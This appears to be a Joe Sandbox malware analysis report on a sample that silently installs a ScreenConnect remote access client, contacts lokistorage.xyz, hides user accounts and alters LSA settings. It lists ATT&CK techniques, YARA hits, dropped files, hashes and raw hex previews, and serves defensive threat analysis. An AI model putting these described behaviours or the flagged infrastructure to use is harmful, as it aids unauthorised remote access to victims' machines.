                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_052C1660 CreateNamedPipeW,8_2_052C1660
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_014E4C61 RtlGetVersion,8_2_014E4C61
                              Source: C:\Users\user\Desktop\H36NgltNe7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: H36NgltNe7.exe, type: SAMPLE
                              Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.790000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.H36NgltNe7.exe.52e0000.7.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.2cbfa10.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.2dcfa50.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.H36NgltNe7.exe.52e0000.7.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.H36NgltNe7.exe.6763d4.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.H36NgltNe7.exe.6fb9d4.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.H36NgltNe7.exe.72518c.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.H36NgltNe7.exe.660000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1493878183.00000000052E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1486363645.0000000002981000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: H36NgltNe7.exe PID: 6560, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5040, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 5796, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\6f527a.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI5509.tmp, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                              Process Injection
                              1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554618 Sample: H36NgltNe7.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 50 55 lokistorage.xyz 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 69 5 other signatures 2->69 8 msiexec.exe 93 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 H36NgltNe7.exe 5 2->15         started        signatures3 67 Performs DNS queries to domains with low reputation 55->67 process4 dnsIp5 35 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->35 dropped 37 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.ClientService.exe, PE32 8->39 dropped 43 10 other files (1 malicious) 8->43 dropped 75 Enables network access during safeboot for specific services 8->75 77 Modifies security policies related information 8->77 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 lokistorage.xyz 95.164.16.15, 49707, 8041 NASSIST-ASGI Gibraltar 12->57 79 Reads the Security eventlog 12->79 81 Reads the System eventlog 12->81 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\...\H36NgltNe7.exe.log, ASCII 15->41 dropped 83 Contains functionality to hide user accounts 15->83 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 20 17->31         started        71 Creates files in the system32 config directory 23->71 73 Contains functionality to hide user accounts 23->73 45 C:\Users\user\AppData\Local\...\MSI4C3F.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              H36NgltNe7.exe21%ReversingLabsWin32.PUA.ConnectWise
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSI5529.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI576D.tmp0%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              lokistorage.xyz
                              95.164.16.15
                              truetrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drfalse
                                  high
                                  http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000008.00000002.2731727368.000000000198B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.00000000031DA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drfalse
                                        high
                                        https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                          high
                                          https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            95.164.16.15
                                            lokistorage.xyzGibraltar
                                            29632NASSIST-ASGItrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1554618
                                            Start date and time:2024-11-12 18:39:14 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 17s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:15
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:H36NgltNe7.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:2baad4cb8a8d6af1916b38237bb766c89c2bde59d555b73484722a48463d4a6f.exe
                                            Detection:MAL
                                            Classification:mal50.troj.evad.winEXE@17/65@1/1
                                            EGA Information:
                                            • Successful, ratio: 60%
                                            HCA Information:
                                            • Successful, ratio: 64%
                                            • Number of executed functions: 172
                                            • Number of non-executed functions: 1
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target H36NgltNe7.exe, PID 6560 because it is empty
                                            • Execution Graph export aborted for target rundll32.exe, PID 2868 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: H36NgltNe7.exe
                                            No simulations
                                            No context
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NASSIST-ASGIJosho.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            J5uGzpvcAa.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            nPRmTlXhOT.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            OwBugJ5CiC.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            H5LPetzgXV.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            4l9YKCc7qQ.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            mCR2IJsjgy.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 95.164.4.65
                                            J3m5xLlT8D.exeGet hashmaliciousDCRatBrowse
                                            • 95.164.6.175
                                            na.elfGet hashmaliciousUnknownBrowse
                                            • 94.131.118.154
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dllLatest version 4.7.exeGet hashmaliciousScreenConnect ToolBrowse
                                              Latest version 4.7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                INSPECAO-B01S.msiGet hashmaliciousScreenConnect ToolBrowse
                                                  1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      5iT2ITz44g.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        5iT2ITz44g.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          E-receipt-67.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            E-receipt-67.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              statment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):219648
                                                                Entropy (8bit):6.581612777793765
                                                                Encrypted:false
                                                                SSDEEP:3072:M09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGd:M0uH2aCGw1ST1wQLdqvd
                                                                MD5:0B76F22BFABF84895FD1EA63D632BB3D
                                                                SHA1:97A5728823C62F33DCE1FCDAEED8023D1D428132
                                                                SHA-256:C69C2F5576DA6EAF68047136FB35BBB084325D4EA96856ED0584A52C4922BCCE
                                                                SHA-512:2812A7BEEA57986B2FF4D90FFEB06CC0541A9A56EBA90DFB71DFA8CCAD73934FF3352C88503BA2CF46C3D18B8E2978A89AD3946262214D88BF88AC4A8FC4C6A5
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\6f527a.rbs, Author: Joe Security
                                                                Reputation:low
                                                                Preview:...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{6E5988BE-3FE4-2081-9090-28726FA53B07}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{AAFCFDA6-3A31-9AA2-04B7-C6C55684F80B}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@......&.{7BEC3624-40B7-0ABF-4C6B-0093902CAEA0}&.{7A085B4C-0189-0C8C-1652-69D0030FEB14}.@....
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):241
                                                                Entropy (8bit):4.920230500734458
                                                                Encrypted:false
                                                                SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsiMI4CAcO:rHy2DLI4MWoj12K9cAuiMI4L
                                                                MD5:E412586907C81C15CED17A120DE270B3
                                                                SHA1:EE0E2EDE15DAD65285184C2044367CC6D20D8709
                                                                SHA-256:0F0E577CD0071C73AFB57530C67C5C79E3A0695FBA617ED5531B882AAB0531EB
                                                                SHA-512:CFB7699A72B393B06B89C197F378EBC31650E0D9B96966F1464BA79E6EF92B6EE9D951D588E47250E9A523869E0E9FDE592E237168B429F430C1A11EE2F8045B
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......Signature Bank
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):169094
                                                                Entropy (8bit):7.97364017646364
                                                                Encrypted:false
                                                                SSDEEP:3072:Q1BQsAtdZEVwx9whh71/ccEOCnJ8GEsuMNSWID4ygf8AuSJpKeza:QHQ96VwPYhx/cc9mJnEsu81Ln/Jwt
                                                                MD5:DE75320C1124233901AA23C368595375
                                                                SHA1:23A40D4AA2F1D71F819581F0EA9FEADA5ED234DA
                                                                SHA-256:32EA2F66A6C8F4345C4AFF82465A5BB81588743CE8CBB25F6D4BEE90E28A00DB
                                                                SHA-512:5FDC124BF5D9C30D13019D4326C91BD5FEEAF46F337C14F87A50E468B0AB8737F34180E8A4CE7B005B761B82ED100812E3B4C5C786AA21F3B8270733A462724B
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....H.....;...H...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.8... 3....PNG........IHDR.......8........C....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<... .IDATx.....(.....'.....q..R. ...L.7.c..$H"..........A...d.k^.r.............u.....r$.......<..8.....O.....{..Xi6....F....P.........N,..I|1..%7.v......X.n..r..5........H..4.GK.~?.9.@K/.+....s=.4Y..-~...;ge..E_Htd..C..../..!.'o...n.6.....jiG`G.~.v........4YJ<g.g...s.....k$...ki{.)..8....AX.X.-..(...f.'..H...5.....|.O....t........p.K....x..y......d.$nx........1...z...U./..:j...u..^..oz..^K.[.-!.........t..m.t..$O........H....h..$..(....;V....t..B.u.f...K...HHS.y....~,.U:Q...D|.....,v..x..n.7..>x".H.z.p..5.:WR>..46.&..4....u..
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):49959
                                                                Entropy (8bit):4.758252520953682
                                                                Encrypted:false
                                                                SSDEEP:1536:sdr6QF+gQpAfqiErOmOCqZUWi+JgJ0FQi9zwHLAhDKZ1HtRKekmrg9:sdr1F+gQOlErOmPqZUWi+JgJ0FQi9zw2
                                                                MD5:511202ED0BA32D7F09EAB394C917D067
                                                                SHA1:DBD611720FD1730198F72DEC09E8E23E6D6488F8
                                                                SHA-256:F8398A235B29AF6569F2B116E0299B95512D042F5A4CD38C98C79729A5FBDB9D
                                                                SHA-512:F04B08938F3EBF8CFA1A1157A94DA3AE4699494BDCE566619AFA5B13A8F6EBE556D522C064E5EA02E343B59A489343F77E3EA2BB2EA390AAE35A626F41CADC77
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):26722
                                                                Entropy (8bit):7.7401940386372345
                                                                Encrypted:false
                                                                SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                Malicious:false
